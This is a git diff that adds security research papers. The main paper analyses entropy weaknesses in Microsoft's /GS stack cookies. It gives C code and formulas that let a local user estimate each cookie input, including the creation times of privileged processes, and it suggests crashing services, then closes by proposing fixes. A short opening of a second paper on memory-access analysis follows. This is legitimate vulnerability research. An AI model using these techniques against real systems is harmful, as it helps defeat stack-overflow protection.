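+// __security_check_cookie.
+extern unsigned long __security_cookie;    // image file's global cookie
+extern void __report_gsfailure(void);      // securely terminates the process
+
+void security_check_cookie_sketch(unsigned long FrameCookie)
+{
+    // A mismatch means something overwrote the cookie stored in the stack
+    // frame, most likely a stack-based buffer overflow.
+    if (FrameCookie != __security_cookie)
+        __report_gsfailure();
+
+    // On a match, simply return and let the caller finish its epilogue.
+}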
+ +.text:0040634B cmp ecx, __security_cookie +.text:00406351 jnz short loc_406355 +.text:00406353 rep retn +.text:00406355 loc_406355: +.text:00406355 jmp __report_gsfailure + +4) Attacking GS + +At the time of this writing, all publicly disclosed attacks against GS that +the author is aware of have relied on getting control of execution before the +cookie is checked or by finding some way to leak the value of the cookie back +to the attacker. Both of these styles of attack are of great interest and +value, but the focus of this paper will be on a different method of attacking +GS. Specifically, this chapter will outline techniques that may be used to +make it easier to guess the value an image file's GS cookie. Two techniques +will be described. The first technique will describe methods for calculating +the values that were used as entropy sources when the cookie was generated. +These calculations are possible in situations where an attacker has local +access to the machine, such as through the console or through terminal +services. The second technique describes the general concept of predictable +ranges of some values that are used in the context of boot start services, +such as lsass.exe. This predictability may make the guessing of a GS cookie +more feasible in both local and remote scenarios. + +4.1) Calculating Entropy Sources + +The sources used to generate the GS cookie for a given image file are constant +and well-known. They include the current system time, process identifier, +thread identifier, tick count, and performance counter. In light of that +fact, it only makes sense to investigate the amount of effective entropy each +source adds to the cookie. Since it's a requirement that the cookie produced +be secret, the ability to guess a value used in the generation of the cookie +will allow it to be canceled out of the equation. This is true due to the +simple fact that each of the values used to generate the cookie is XOR'd with +each other value (XOR is a commutative operation). The ability to guess +multiple values can make it possible to seriously impact the overall integrity +of the cookie. + +While the sources used in the generation of the cookie have long been regarded +as satisfactory, the author has found that the majority of the sources +actually contribute little to no value toward the overall entropy of the +cookie. However, this is currently only true if an attacker has local access +to the machine. Being able to know a GS cookie that was used in a privileged +process would make it possible to exploit a local privilege escalation +vulnerability, for example. There may be some circumstances where the +techniques described in this section could be applied remotely, but for the +purpose of this document, only the local scenario will be considered. The +following subsections will outline methods that can be used to calculate or +deterministically find the specific values that were used when a cookie was +being generated in a particular process context. As a result of this +analysis, it's become clear that the only particular variable source of true +entropy for the GS cookie is the low 17 bits of the performance counter. All +other sources can be reliably calculated, with some margin of error. + +For the following subsections, a modified executable named vulnapp.exe was +used to extract the information that was used at the time that a process +executable's GS cookie was generated. 
In particular, __security_init_cookie was +modified to jump into a function that saves the information used to generate +the cookie. The implementation of this function is shown below for those who +are curious: + +// +// The FramePointer is the value of EBP in the context of the +// __security_init_cookie routine. The cookie is the actual, +// resultant cookie value. GSContext is a global array. +// +VOID DumpInformation( + PULONG FramePointer, + ULONG Cookie) +{ + GSContext[0] = FramePointer[-3]; + GSContext[1] = FramePointer[-4]; + GSContext[2] = FramePointer[-1]; + GSContext[3] = FramePointer[-2]; + GSContext[4] = GetCurrentProcessId(); + GSContext[5] = GetCurrentThreadId(); + GSContext[6] = GetTickCount(); + GSContext[7] = Cookie; +} + +4.1.1) System Time + +System time is a value that one might regard as challenging to recover. After +all, it seems impossible to get the 100 nanosecond granularity of the system +time that was retrieved when a cookie was being generated. Quite the +contrary, actually. There are a few key points that go into being able to +recover the system time. First, it's a fact that even though the system time +measures granularity in terms of 100 nanosecond intervals, it's really only +updated every 15.625 milliseconds (or 10.1 milliseconds for more modern CPUs). +To many, 15.625 may seem like an odd number, but for those familiar with the +Windows thread scheduler, it can be recognized as the period of the timer +interrupt. For that reason, the current system time is only updated as a +result of the timer interrupt firing. This fact means that the alignment of +the system time that is used when a cookie is generated is known. + +Of more interest, though, is the relationship between the system time value +and the creation time value associated with a process or its initial thread. +Since the minimum granularity of the system time is 15.6 or 10.1 milliseconds, +it follows that the granularity of the thread creation time will be the same. +In terms of modern CPUs, 15.6 milliseconds is an eternity and is plenty long +for the processor to execute all instructions from the creation of the thread +to the generation of the security cookie. This fact means that it's +possible to assume that the creation time of a process or thread is the +same as the system time that was used when the cookie was generated. This +assumption doesn't always work, though, and there are indeed cases where +the creation time will not equal the system time that was used. These +situations are usually a result of the thread that creates the cookie not +being immediately scheduled. + +Even if this is the case, it would be necessary to be able to obtain the +creation time of an arbitrary process or thread. On the surface, this would +seem impossible because task manager prevents a non-privileged user from +getting the start time of a privileged process. + +This is all a deception, though, because there does exist functionality that +is exposed to non-privileged users that can be used to get this information. +One way of getting it is through the use of the native API routine +NtQuerySystemInformation. In this case, the +SystemProcessesAndThreadsInformation system information class is used to query +information about all of the running processes on the system. This +information includes the process name, process creation time, and the creation +time for each thread in each process. 
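+
+A rough sketch of such a query is given below. The structure is a truncated
+version of the undocumented per-process record that this information class
+returns (winternl.h exposes the class under the name SystemProcessInformation);
+the field layout reflects the commonly published Windows XP definition and
+should be treated as an assumption to verify, the routine name is purely
+illustrative, and the caller is expected to link against ntdll.lib or resolve
+NtQuerySystemInformation with GetProcAddress.
+
+#include <windows.h>
+#include <winternl.h>
+#include <stdio.h>
+#include <stdlib.h>
+
+#ifndef STATUS_INFO_LENGTH_MISMATCH
+#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
+#endif
+
+// Truncated form of the per-process record; only the fields read below are
+// declared, and the per-thread records that follow each entry (which carry
+// the individual thread creation times) are omitted for brevity.
+typedef struct _PROCESS_ENTRY_PREFIX {
+    ULONG          NextEntryOffset;
+    ULONG          NumberOfThreads;
+    LARGE_INTEGER  Reserved[3];
+    LARGE_INTEGER  CreateTime;     // 100ns units, same scale as system time
+    LARGE_INTEGER  UserTime;
+    LARGE_INTEGER  KernelTime;
+    UNICODE_STRING ImageName;
+    LONG           BasePriority;
+    HANDLE         UniqueProcessId;
+} PROCESS_ENTRY_PREFIX;
+
+void DumpCreationTimes(void)
+{
+    ULONG    Length = 0x10000;
+    PUCHAR   Buffer = NULL;
+    NTSTATUS Status;
+
+    // Grow the buffer until the full process snapshot fits.
+    do {
+        free(Buffer);
+        if (!(Buffer = (PUCHAR)malloc(Length *= 2)))
+            return;
+        Status = NtQuerySystemInformation(SystemProcessInformation,
+                                          Buffer, Length, NULL);
+    } while (Status == STATUS_INFO_LENGTH_MISMATCH);
+
+    if (Status == 0) {
+        PROCESS_ENTRY_PREFIX *Entry = (PROCESS_ENTRY_PREFIX *)Buffer;
+
+        for (;;) {
+            printf("pid %4lu  create %08lx%08lx  %.*ws\n",
+                   (ULONG)(ULONG_PTR)Entry->UniqueProcessId,
+                   Entry->CreateTime.HighPart,
+                   Entry->CreateTime.LowPart,
+                   Entry->ImageName.Length / 2,
+                   Entry->ImageName.Buffer ? Entry->ImageName.Buffer : L"");
+
+            if (!Entry->NextEntryOffset)
+                break;
+
+            Entry = (PROCESS_ENTRY_PREFIX *)
+                        ((PUCHAR)Entry + Entry->NextEntryOffset);
+        }
+    }
+
+    free(Buffer);
+}
+
+Run as a non-privileged user, a routine like this will happily report the
+creation times of privileged processes such as lsass.exe, which is precisely
+the piece of information needed to approximate the system time component of
+their cookies.
+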
While this information class has been +removed in Windows Vista, there are still potential ways of obtaining the +creation time information. For example, an attacker could simply crash the +vulnerable service once (assuming it's not a critical service) and then wait +for it to respawn. Once it respawns, the creation time can be inferred based +on the restart delay of the service. Granted, service restarts are limited +to three times per day in Vista, but crashing it once should cause no major +issues. + +Using NtQuerySystemInformation, it's possible to collect some data that can be +used to determine the likelihood that the creation time of a thread will be +equal to the system time that was used when a GS cookie was generated. To +test this, the author used the modified vulnapp.exe executable to extract the +system time at the time that the cookie was generated. Following that, a +separate program was used to collect the creation time information of the +process in question using the native API. The initial thread's creation time +was then compared with the system time to see if they were equal. The +creation time and system time were often equal in a sample of 742 cookies. + +Obviously, the data set describing differences is only relevant to a +particular system load. If there are many threads waiting to run during the +time that a process is executed, then it is unlikely that the system time will +equal the process creation time. In a desktop environment, it's probably safe +to assume that the thread will run immediately, but more conclusive evidence +may be necessary. + +Given these facts, it is apparent that the complete 64-bit system time value +can be recovered more often than not with a great degree of accuracy just by +simply assuming that thread creation time is the same as the system time +value. + +4.1.2) Process and Thread Identifier + +The process and thread identifier are arguably the worst sources of entropy +for the GS cookie, at least in the context of a local attack. The two high +order bytes of the process and thread identifiers are almost always zero. +This means they have absolutely no effect on the high order entropy. +Additionally, the process and thread identifier can be determined with 100 +percent accuracy in a local context using the same API described in the +previous section on getting the system time. This involves making use of +the NtQuerySystemInformation native API with the +SystemProcessesAndThreadsInformation system information class to get the +process identifier and thread identifier associated with a given process +executable. + +The end result, obviously, is that the process and thread identifier can be +determined with great accuracy. The one exception to this rule would be +Windows Vista, but, as was mentioned before, alternative methods of obtaining +the process and thread identifier may exist. + +4.1.3) Tick Count + +The tick count is, for all intents and purposes, simply another measure of +time. When the GetTickCount API routine is called, the number of ticks is +multiplied by the tick count multiplier. This multiplication effectively +translates the number of ticks to the number of milliseconds that the system +has been up. If one can safely assume that the that the system time used to +generate the cookie was the same as the thread creation time, then the tick +count at the time that the cookie was generated can simply be calculated using +the thread creation time. The creation time isn't enough, though. 
Since the +GetTickCount value measures the number of milliseconds that have occurred +since boot, the actual uptime of the system has to be determined. + +To determine the system uptime, a non-privileged user can again make use of +the NtQuerySystemInformation native API, this time with the +SystemTimeOfDayInformation system information class. This query returns the +time that the system was booted as a 64-bit integer measured in 100 nanosecond +intervals, just like the thread creation time. To calculate the system uptime +in milliseconds, it's as simple as subtracting the boot time from the creation +time and then dividing by 10000 to convert from 100 nanosecond intervals to 1 +millisecond intervals: + +EstTickCount = (CreationTime - BootTime) / 10000 + +Some experimentation shows that this calculation is pretty accurate, but some +quantity is lost in translation. From what the author has observed, a +constant scaling factor of 0x4e, or 78 milliseconds, needs to be added to the +result of this calculation. The source of this constant is as of yet unknown, +but it appears to be a required constant. This results in the actual equation +being: + +EstTickCount = [(CreationTime - BootTime) / 10000] + 78 + +The end result is that the tick count can be calculated with a great degree of +accuracy. If the system time calculation is off, then that will directly +affect the calculation of the tick count. + +4.1.4) Performance Counter + +Of the four entropy sources discussed so far, the performance counter is the +only one that really presents a challenge. The purpose of the performance +counter is to describe the total number of cycles that have executed. On the +outside, the performance counter would seem impossible to reliably determine. +After all, how could one possibly determine the precise number of cycles that +had occurred as a cookie was being generated? The answer, of course, comes +down to the fact that the performance counter itself is, for all intents and +purposes, just another measure of time. Windows provides two interesting +user-mode APIs that deal with the performance counter. The first, +QueryPerformanceCounter, is used to ask the kernel to read the current value +of the performance counter[8]. The result of this query is stored in the 64-bit +output parameter that the caller provides. The second API is +QueryPerformanceFrequency. This routine is interesting because it returns a +value that describes the amount that the performance counter will change in +one second[7]. Documentation indicates that the frequency cannot change while +the system is booted. + +Using the existing knowledge about the uptime of the system and the +calculation that can be performed to convert between the performance counter +value and seconds, it is possible to fairly accurately guess what the +performance counter was at the time that the cookie was generated. Granted, +this method is more fuzzy than the previously described methods, as +experimental results have shown a large degree of fluctuation in the lower 17 +bits. Those results will be discussed in more detail in chapter . 
The actual +equation that can be used to generate the estimated performance counter is to +take the uptime, as measured in 100 nanosecond intervals, and multiply it by +the performance frequency divided by 10000000, which converts the frequency +from a measure of 1 second to 100 nanosecond: + +EstPerfCounter = UpTime x (PerfFreq / 10000000) + +In a fashion similar to tick count, a constant scaling factor of -165000 was +determined through experimentation. This seems to produce more accurate +results in some of the 24 low bits. Based on this calculation, it's possible +to accurately determine the entire 32-bit high order integer and the first 15 +bits of the 32-bit low order integer. Of course, if the system time estimate +is wrong, then that directly effects this calculation. + +4.1.5) Frame Pointer + +While the frame pointer does not influence an image file's global cookie, it +does influence a stack frame's version of the cookie. For that reason, the +frame pointer must be considered as an overall contributor to the effective +entropy of the cookie. With the exception of Windows Vista, the frame pointer +should be a deterministic value that could be deduced at the time that a +vulnerability is triggered. As such, the frame pointer should be considered a +known value for the majority of stack-based buffer overflows. Granted, in +multi-threaded applications, it may be more challenging to accurately guess +the value of the frame pointer. + +In the Windows Vista environment, the compile-time GS implementation gets a +boost in security due to the introduction of ASLR. This helps to ensure that +the frame pointer is actually an unknown quantity. However, it doesn't +introduce equal entropy in all bits. In particular, octet 4, and potentially +octet 3, may have predictable values due to the way that the randomization is +applied to dynamic memory allocations. In order to prevent fragmentation of +the address space, Vista's ASLR implementation attempts to ensure that stack +regions are still allocated low in the address space. This has the side +effect of ensuring that a non-trivial number of bits in the frame pointer will +be predictable. Additionally, while Vista's ASLR implementation makes an +effort to shift the lower bits of the stack pointer, there may still be some +bits that are always predictable in octet 2. + +4.2) Predictability of Entropy Sources in Boot Start Services + +A second attack that could be used against GS involves attacking services that +start early on when the system is booted. These services may experience more +predictable states of entropy due to the fact that the amount of time it takes +to boot up and the order in which tasks are performed is fairly, though not +entirely, consistent. This insight may make it possible to estimate the value +of entropy sources remotely. + +To better understand this type of attack, the author collected 742 samples +that were taken from a custom service that was set to automatically start +during boot on a Windows XP SP2 installation. This service was simply +designed to log the state used at the time that the GS cookie was being +generated. While a sampling of the GS cookie state applied to lsass.exe would +have been more ideal, it wasn't worth the headache of having to patch a +critical system service. Perhaps the reader may find it interesting to +collect this data on their own. From the samples that were taken, the +following diagrams show the likelihood of each individual bit being set for +each of the different entropy sources. 
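+
+The per-bit likelihood for a given source can be computed from a set of
+logged samples with a small counting routine along the lines of the sketch
+below; the sample array is assumed to have been populated by the logging
+service described above, and the routine name is illustrative.
+
+#include <stdio.h>
+
+// For one entropy source (e.g. the low 32 bits of the performance counter),
+// compute the percentage of samples in which each bit position was set.
+void BitLikelihood(const unsigned long *Samples, unsigned long Count)
+{
+    unsigned long SetCount[32] = { 0 };
+    unsigned long Index;
+    int           Bit;
+
+    for (Index = 0; Index < Count; Index++)
+        for (Bit = 0; Bit < 32; Bit++)
+            if (Samples[Index] & (1UL << Bit))
+                SetCount[Bit]++;
+
+    for (Bit = 31; Bit >= 0; Bit--)
+        printf("bit %2d set %5.1f%% of the time\n",
+               Bit, (SetCount[Bit] * 100.0) / Count);
+}
+
+A bit whose likelihood sits near zero or one hundred percent contributes
+essentially nothing to the effective entropy of the cookie.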
+ +Overall, there are a number of predictable bits in things like the high +32-bits of both the system time and the performance counter, the process +identifier, the thread identifier, and the tick count. The sources that are +largely unpredictable are the low 32-bits of the system time and the +performance counter. However, if it were possible to come up with a way to +discover the boot time (or uptime) of the system remotely, it might be +possible to infer a good portion of the low 32-bits of the system time. This +would then directly impact the ability to estimate things like the tick count +and performance counters. + +5) Experimental Results + +This chapter describes some of the initial results that were collected using a +utility developed by the author named gencookie.exe. This utility attempts to +calculate the value of the cookie that was generated for the executable image +associated with an arbitrary process, such as lsass.exe. While the results of +this utility were limited to attempting to calculate the cookie of a process' +executable, the techniques described in previous chapters are nonetheless +applicable to the cookies generated in the context of dependent DLLs. The +results described in this chapter illustrate the tool's ability to accurately +obtain specific bits within the different components that compose the cookie, +including specific bits of the cookie itself. This helps to paint a picture +of the amount of true entropy that is reduced through the techniques described +in this document. + +The data set that was used to calculate the overall results included 5001 +samples which were collected from a single machine. The samples were +collected through a few simple steps. First, a program called vulnapp.exe +that was compiled with /GS was modified to have its __security_init_cookie routine +save information about the cookie that was generated and the values that +contributed to its generation. Following that, the gencookie.exe utility was +launched against the running process in an attempt to calculate vulnapp.exe's +GS cookie. A comparison between the expected and actual value of each +component was then saved. These steps were repeated 5001 times. The author +would be interested in hearing about independent validation of the findings +presented in this chapter. + +The following sections describe the bit-level predictability of each of the +components that are used to generate the GS cookie, including the overall +predictability of the bits of the GS cookie itself. + +5.1) System Time + +The system time component was highly predictable. The high 32-bit bits of the +system time were predicted with 100 percent accuracy. The low 32-bit bits on +the other hand were predicted with only 77 percent accuracy (3878 times). The +reason for this discrepancy has to do with the thread scheduling scenario +described in subsection . Even still, these results indicate that it is +likely that the entire system time value can be accurately calculated. + +5.2) Process and Thread Identifier + +The process and thread identifier were successfully calculated 100 percent of +the time using the approach outlined in section . + +5.3) Tick Count + +The tick count was accurately calculated 67 percent of the time (3396 times). +The reason for this lower rate of success is due in large part to the fact +that the tick count is calculated in relation to the estimated system time +value. As such, if an incorrect system time value is determined, the tick +count itself will be directly influenced. 
This should account for at least 23 +percent of the inaccuracies judging from how often the system time was +inaccurately estimated. The remaining 10 percent of the inaccuracies is as of +yet undetermined, but it is most likely related to the an improper +interpretation of the constant scaling factor that is applied to the tick +count. In any case, it is expected that only a few bits are actually affected +in the remaining 10 percent of cases. + +5.4) Performance Counter + +The high 32-bits of the performance counter were successfully estimated 100 +percent of the time. The low 32-bits, on the other hand, show the greatest +degree of volatility when compared to the other components. The high order 15 +bits of the low 32-bits show a bias in terms of accuracy that is not a 50/50 +split. The remaining 17 bits were all guessed correctly roughly 50 percent of +the time. This makes the low 17 bits the only truly effective source of +entropy in the performance counter since there is no bias shown in relation to +the estimated versus actual values. Indeed, this is not enough to prove that +there aren't observable patterns in the low 17 bits, but it is enough to show +that the gencookie.exe utility was not effective in estimating them. Figures +and show the percent accuracy for the high and low order 32-bits. + +This discrepancy actually requires a more detailed explanation. In reality, +the estimates made by the gencookie.exe utility are actually not as far off as +one might think based on the percent accuracy of each bit as described in the +diagrams. Instead, the estimates are, on average, off by only 105,000. This +average difference is what leads to the lower 17 bits being so volatile. One +thing that's interesting about the difference between the estimated and actual +performance counter is that there appears to be a time oriented trend related +to how far off the estimates are. Due to the way that the samples were taken, +it's safe to assume that each sample is roughly equivalent to one second worth +of time passing (due to a sleep between sample collection). Further study of +this apparent relationship may yield better results in terms of estimating the +lower 17 bits of the low 32 bits of the performance counter. This is left for +future research. + +5.5) Cookie + +The cookie itself was never actually guessed during the course of sample +collection. The reason for this is tightly linked with the current inability +to accurately determine the lower 17 bits of the low 32 bits of the +performance counter. Comparing the percent accuracy of the cookie bits with +the percent accuracy of the low 32 bits of the performance counter yields a +very close match. + +6) Improvements + +Based on the results described in chapter , the author feels that there is +plenty of room for improvement in the way that GS cookies are currently +generated. It's clear that there is a need to ensure that there are 32 bits +of true entropy in the cookie. The following sections outline some potential +solutions to the entropy issue described in this document. + +6.1) Better Entropy Sources + +Perhaps the most obvious solution would be to simply improve the set of +entropy sources used to generate the cookie. In particular, the use of +sources with greater degrees of entropy, especially in the high order bits, +would be of great benefit. The challenge, however, is locating sources that +are easy to interact with and require very little overhead. 
For example, it's +not really feasible to have the GS cookie generator rely on the crypto API due +to the simple fact that this would introduce a dependency on the crypto API in +any application that was compiled with /GS. As this document has hopefully +shown, it's also a requirement that any additional entropy sources be +challenging to estimate externally at a future point in time. + +Even though this is a viable solution, the author is not presently aware of +any additional entropy sources that would meet all three requirements. For +this reason, the author feels that this approach alone is insufficient to +solve the problem. If entropy sources are found which meet these +requirements, the author would love to hear about them. + +6.2) Seeding High Order Bits + +A more immediate solution to the problem at hand would involve simply ensuring +that the predictable high order bits are seeded with less predictable values. +However, additional entropy sources would be required in order to implement +this properly. At present, the only major source of entropy found in the GS +cookie is the low order bits of the performance counter. It would not be +sufficient to simply shift the low order bits of the performance counter into +the high order. Doing so would add absolutely no value by itself because it +would have no effect on the amount of true entropy in the cookie. + +6.3) External Cookie Generation + +An alternative solution that could combine the effects of the first two +solutions would be to change the GS implementation to generate the cookie +external to the binary itself. One of the most dangerous aspects of the GS +implementation is that it is statically linked and therefore would require a +recompilation of all affected binaries in the event that a weakness is found. +This fact alone should be scary. To help address both this problem and the +problem of weak entropy sources, it makes sense to consider a more dynamic +approach. + +One example of a dynamic approach would be to have the GS implementation issue +a call into a kernel-mode routine that is responsible for generating GS +cookies. One place that this support could be added is in +NtQuerySystemInformation, though it's likely that a better place may exist. +Regardless of the specific routine, this approach would have the benefit of +moving the code used to generate the cookie out of the statically linked stub +that is inserted by the compiler. If any weakness were to be found in the +kernel-mode routine that generates the cookie, Microsoft could issue a patch +that would immediately affect all applications compiled to use GS. This would +solve some of the concerns relating to the static nature of GS. + +Perhaps even better, this approach would grant greater flexibility to the +entropy sources that could be used in the generation of the cookie. Since the +routine would exist in kernel-mode, it would have the benefit of being able to +access additional sources of entropy that may be challenging or clumsy to +interact with from user-mode (though the counterpoint could certainly be made +as well). The kernel-mode routine could also accumulate entropy over time and +feed that back into the cookie, whereas the statically linked implementation +has no context with which to accumulate entropy. The accumulation of state +can also do more harm than good. It would be disingenuous to not admit that +this approach could also have its own set of problems. 
A poorly implemented +version of this solution might make it possible for a user to eliminate all +entropy by issuing a non-trivial number of calls to the kernel-mode routine. +There may be additional consequences that have not yet been perceived. + +The impact on performance is also a big point of concern for any potential +change to the cookie generation path. At a high-level, a transition into +kernel-mode would seem concerning in terms of the amount of overhead that +might be added. However, it's important to note that the current +implementation of GS already transitions into kernel-mode to obtain some of +it's information. Specifically, performance counter information is obtained +through the system call NtQueryPerformanceCounter. Even more, this system +call results in an in operation on an I/O port that is used to query the +current performance counter. + +Another important consideration is backward compatibility. If Microsoft were +to implement this solution, it would be necessary for applications compiled +with the new support to still be able benefit from GS on older platforms that +don't support the new kernel interface. To allow for backward compatibility, +Microsoft could implement a combination of all three solutions, whereby better +entropy sources and seeding of high order bits are used as a fallback in the +event that the kernel-mode interface is not present. + +As it turns out, Microsoft does indeed have a mechanism that could allow them +to create a patch that would affect the majority of the binaries compiled with +recent versions of GS. This functionality is provided by exposing the address +of an image file's security cookie in its the load config data directory. +When the dynamic loader (ntdll) loads an image file, it checks to see if the +security cookie address in the load config data directory is non-NULL. If +it's not NULL, the loader proceeds to store the process-wide GS cookie in the +module-specific's GS cookie location. In this way, the __security_init_cookie +routine that's called by the image file's entry point effectively becomes a +no-operation because the cookie will have already been initialized. This +manner of setting the GS cookie for image files provides Microsoft with much +more flexibility. Rather than having to update all binaries compiled with GS, +Microsoft can simply update a single binary (ntdll.dll) if improvements need +to be made to the cookie generation algorithm. The following output shows a +sample of dumpbin /loadconfig on kernel32.dll: + +Microsoft (R) COFF/PE Dumper Version 8.00.50727.42 +Copyright (C) Microsoft Corporation. All rights reserved. + + +Dump of file c:\windows\system32\kernel32.dll + +File Type: DLL + + Section contains the following load config: + + 00000048 size + 0 time date stamp +... + 7C8836CC Security Cookie + +7) Future Work + +There is still additional work that can be done to further refine the +techniques described in this document. This chapter outlines some of the +major items that could be followed up on. + +7.1) Improving Performance Counter Estimates + +One area in particular that the author feels could benefit from further +research has to do with refining the technique used to calculate the +performance counter. A more thorough analysis of the apparent association +between time and the lower 17 bits of the performance counter is necessary. 
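+
+As a hypothetical starting point for that analysis, a small sampling harness
+along the following lines could be used to log how the low 17 bits of the
+performance counter drift over time. This is only a sketch and is not part of
+the gencookie.exe utility described earlier; the one second sleep simply
+mirrors the sampling interval used during data collection.
+
+/*
+ * Hypothetical sampling harness: once per second, log elapsed time and the
+ * low 17 bits of the performance counter so that any time-dependent drift
+ * can be studied offline.
+ */
+#include <windows.h>
+#include <stdio.h>
+
+int main(void)
+{
+    LARGE_INTEGER pc;
+    DWORD start = GetTickCount();
+    int i;
+
+    for (i = 0; i < 600; i++) {
+        QueryPerformanceCounter(&pc);
+
+        /* the low 17 bits of the low 32 bits are the only portion that
+         * showed no estimation bias in the results above */
+        printf("%lu,%lu\n", GetTickCount() - start,
+               (unsigned long)(pc.LowPart & 0x1FFFF));
+
+        Sleep(1000);
+    }
+
+    return 0;
+}
+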
+This analysis would directly affect the ability to recover more cookie state +information, since the entropy of the lower 17 bits of the performance counter +is one of the only things standing in the way of obtaining the entire cookie. + +7.2) Remote Attacks + +The ability to apply the techniques described in this document in a remote +scenario would obviously increase the severity of the problem. In order to do +this, an attacker would need the ability to either infer or be able to +calculate some of the key elements that are used in the generation of a +cookie. This would rely on being able to determine things like the process +creation time, the process and thread identifier, and the system uptime. With +these values, it should be possible to predict the state of the cookie with +similar degrees of accuracy. Of course, methods of obtaining this information +remotely are not obvious. + +One point of consideration that should be made is that even if it's not +possible to directly determine some of this information, it may be possible to +infer it. For instance, consider a scenario where a vulnerability in a +service is exposed remotely. There's nothing to stop an attacker from causing +the service to crash. In most cases, the service will restart at some +predefined point (such as 30 seconds after the crash). Using this approach, +an attacker could infer the creation time of the process based on the time +that the crash was generated. This isn't fool proof, but it should be +possible to get fairly close. + +Determining process and thread identifier could be tricky, especially if the +system has been up for some time. The author is not aware of a general +purpose technique that could be used to determine this information remotely. +Fortunately, the process and thread identifier have very little effect on high +order bits. + +The system uptime is an interesting one. In the past, there have been +techniques that could be used to estimate the uptime of the system through the +use of TCP timestamps and other network protocol anomalies. At the time of +this writing, the author is not aware of how prevalent or useful these +techniques are against modern operating systems. Should they still be +effective, they would represent a particularly useful way of obtaining a +system's uptime. If an attacker can obtain both the creation time of the +process and the uptime of the system, it's possible to calculate the tick +count and performance counter values with varying degrees of accuracy. + +The performance counter will still pose a great challenge in the remote +scenario. The reliance on the performance frequency shouldn't be seen as an +unknown quantity. As far as the author is aware, the performance frequency on +modern processors is generally 3579545, though there may be certain power +situations that would cause it to be different. + +It is also important to note that the current attack assumes that the load +time for an image that has a GS cookie is equivalent to the initial thread's +creation time. For example, if a DLL were loaded much later in process +execution, such as through instantiating a COM object in Internet Explorer, it +would not be possible to assume that initial thread creation time is equal to +the system time that was obtained when the DLL's GS cookie was generated. +This brings about an interesting point for the remote scenario, however. 
If +an attacker can control the time at which a DLL is loaded, it may be possible +for them to infer the value of system time that is used without even having to +directly query it. One example of this would be in the context of internet +explorer, where the client's date and time functionality might be abused to +obtain this information. + +8) Conclusion + +The ability to reduce the amount of effective entropy in a GS cookie can +improve an attacker's chances of guessing the cookie. This paper has +described two techniques that may be used to calculate or infer the values of +certain bits in a GS cookie. The first approach involves a local attacker's +ability to collect information that makes it possible to calculate, with +pretty good accuracy, the values of the entropy sources that were used at the +time that a cookie was generated. The second approach describes the potential +for abusing the limited entropy associated with boot start services. + +While the results shown in this paper do not represent a complete break of GS, +they do hint toward a general weakness in the way that GS cookies are +generated. This is particularly serious given the fact that GS is a compile +time solution. If the techniques described in this document are refined, or +new and improved techniques are identified, a complete break of GS would +require the recompilation of all affected binaries. The implications of this +should be obvious. The ability to reliably predict the value of a GS cookie +would effectively nullify any benefits that GS adds. It would mean that all +stack-based buffer overflows would immediately become exploitable. + +To help contribute to the improvement of GS, a few different solutions were +described that could either partially or wholly address some of the weakness +that were identified. The most interesting of these solutions involves +modifying the GS implementation to make use of a external cookie generator, +such as the kernel. Going this route would ensure that any weaknesses found +in the cookie generation algorithm could be simply addressed through a patch +to the kernel. This is much more reasonable than expecting all existing GS +enabled binaries to be recompiled. + +It's unclear whether the techniques presented in this paper will have any +appreciable effect on future exploits. Only time will tell. + +References + +[1] Cowan, Crispin et al. StackGuard: Automatic Adaptive Detection and Prevention of Buffer-Overflow Attacks. + http://www.usenix.org/publications/library/proceedings/sec98/full_papers/cowan/cowan_html/cowan.html; accessed 3/18/2007. + +[2] Etoh, Hiroaki. GCC extension for protecting applications from stack-smashing attacks. + http://www.research.ibm.com/trl/projects/security/ssp/; accessed 3/18/2007. + +[3] eEye. Memory Retrieval Vulnerabilities. + http://research.eeye.com/html/Papers/download/eeyeMRV-Oct2006.pdf; accessed 3/18/2007. + +[4] Litchfield, David. Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft Windows 2003 Server + http://www.nextgenss.com/papers/defeating-w2k3-stack-protection.pdf; accessed 3/18/2007. + +[5] Microsoft Corporation. /GS (Buffer Security Check). + http://msdn2.microsoft.com/en-us/library/8dbf701c(VS.80).aspx; accessed 3/18/2007. + +[6] Microsoft Corporation. /SAFESEH (Image has Safe Exception Handlers). + http://msdn2.microsoft.com/en-us/library/9a89h429(VS.80).aspx; accessed 3/18/2007. + +[7] Microsoft Corporation. QueryPerformanceFrequency Function. 
+ http://msdn2.microsoft.com/en-us/library/ms644905.aspx; accessed 3/18/2007 + +[8] Microsoft Corporation. QueryPerformanceCounter Function. + http://msdn2.microsoft.com/en-us/library/ms644904.aspx; accessed 3/18/2007 + +[9] Ren, Chris et al. Microsoft Compiler Flaw Technical Note + http://www.cigital.com/news/index.php?pg=art&artid=70; accessed 3/18/2007. + +[10] Whitehouse, Ollie. Analysis of GS protections in Windows Vista + http://www.symantec.com/avcenter/reference/GS_Protections_in_Vista.pdf; accessed 3/20/2007. diff --git a/uninformed/7.2.txt b/uninformed/7.2.txt new file mode 100644 index 0000000..5df64d7 --- /dev/null +++ b/uninformed/7.2.txt @@ -0,0 +1,800 @@ +Memalyze: Dynamic Analysis of Memory Access Behavior in Software +skape +mmiller@hick.org +4/2007 + +Abstract + +This paper describes strategies for dynamically analyzing an application's +memory access behavior. These strategies make it possible to detect when a +read or write is about to occur at a given location in memory while an +application is executing. An application's memory access behavior can provide +additional insight into its behavior. For example, it may be able to provide +an idea of how data propagates throughout the address space. Three individual +strategies which can be used to intercept memory accesses are described in +this paper. Each strategy makes use of a unique method of intercepting memory +accesses. These methods include the use of Dynamic Binary Instrumentation +(DBI), x86 hardware paging features, and x86 segmentation features. A +detailed description of the design and implementation of these strategies for +32-bit versions of Windows is given. Potential uses for these analysis +techniques are described in detail. + +1) Introduction + +If software analysis had a holy grail, it would more than likely be centered +around the ability to accurately model the data flow behavior of an +application. After all, applications aren't really much more than +sophisticated data processors that operate on varying sets of input to produce +varying sets of output. Describing how an application behaves when it +encounters these varying sets of input makes it possible to predict future +behavior. Furthermore, it can provide insight into how the input could be +altered to cause the application to behave differently. Given these benefits, +it's only natural that a discipline exists that is devoted to the study of +data flow analysis. + +There are a two general approaches that can be taken to perform data flow +analysis. The first approach is referred to as static analysis and it +involves analyzing an application's source code or compiled binaries without +actually executing the application. The second approach is dynamic analysis +which, as one would expect, involves analyzing the data flow of an application +as it executes. The two approaches both have common and unique benefits and +no argument will be made in this paper as to which may be better or worse. +Instead, this paper will focus on describing three strategies that may be used +to assist in the process of dynamic data flow analysis. + +The first strategy involves using Dynamic Binary Instrumentation (DBI) to +rewrite the instruction stream of the executing application in a 